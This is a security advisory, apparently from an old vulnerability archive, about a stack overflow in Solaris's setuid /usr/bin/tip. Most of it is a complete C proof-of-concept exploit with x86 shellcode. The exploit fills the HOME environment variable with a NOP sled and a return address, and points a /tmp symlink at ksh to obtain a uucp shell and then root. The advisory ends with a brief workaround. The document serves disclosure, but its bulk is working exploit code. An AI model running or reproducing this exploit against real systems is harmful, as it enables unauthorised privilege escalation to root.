COMMAND

    /usr/bin/tip

SYSTEMS AFFECTED

    Solaris 2.5, 2.5.1, 2.6, 7, 8

PROBLEM

    Pablo Sor found  following.  The  tip program is  installed setuid
    uucp  by  default  in  Solaris,  it  contains  a  vulnerability in
    handling data from enviroment variables, if this variable  exceeds
    predefined  lenght  an  exploitable  stack  overflow  can   occur.
    Through  exploiting  this  vulnerability  an  attacker  can   gain
    effective uid uucp and through that root.

    Exploit Code:

    #include <fcntl.h>
    
    /*
       /usr/bin/tip overflow proof of conecpt.
    
    
       Pablo Sor, Buenos Aires, Argentina 03/2001
       psor@afip.gov.ar
    
       works against x86 solaris 7,8
    
       default offset should work.
    
    */
    
    
    long get_esp() { __asm__("movl %esp,%eax"); }
    
    int main(int ac, char **av)
    {
    
    char shell[]=
    "\xeb\x0a\x9a\x01\x02\x03\x5c\x07\x04\xc3\xeb\x05"
    "\xe8\xf9\xff\xff\xff\x5e\x29\xc0\x88\x46\xf7\x89\x46\xf2"
    "\x50\xb0\x8d\xe8\xe0\xff\xff\xff\x6a\x05\x90\xb0\x17\xe8\xd6\xff\xff\xff"
    
    "\xeb\x1f\x5e\x8d\x1e\x89\x5e\x0b\x29\xc0\x88\x46\x19\x89\x46\x14"
    "\x89\x46\x0f\x89\x46\x07\xb0\x3b\x8d\x4e\x0b\x51\x51\x53\x50\xeb\x18"
    "\xe8\xdc\xff\xff\xff\x2f\x74\x6d\x70\x2f\x78\x78\x01\x01\x01\x01\x02\x02"
    
    "\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
    
      unsigned long magic = get_esp() + 0x50;  /* default offset */
      unsigned char buf[600];
    
      symlink("/bin/ksh","/tmp/xx");
      memset(buf,0x90,600);
      buf[599]=0;
      memcpy(buf+(sizeof(buf)-strlen(shell)),shell,strlen(shell));
      memcpy(buf,"HOME=",5);
      memcpy(buf+265,&magic,4);
      putenv(buf);
    
      system("/usr/bin/tip 5");
      unlink("/tmp/xx");
    }

SOLUTION

    Clear the suid bit of /usr/bin/tip program.  Patches are  excepted
    shortly.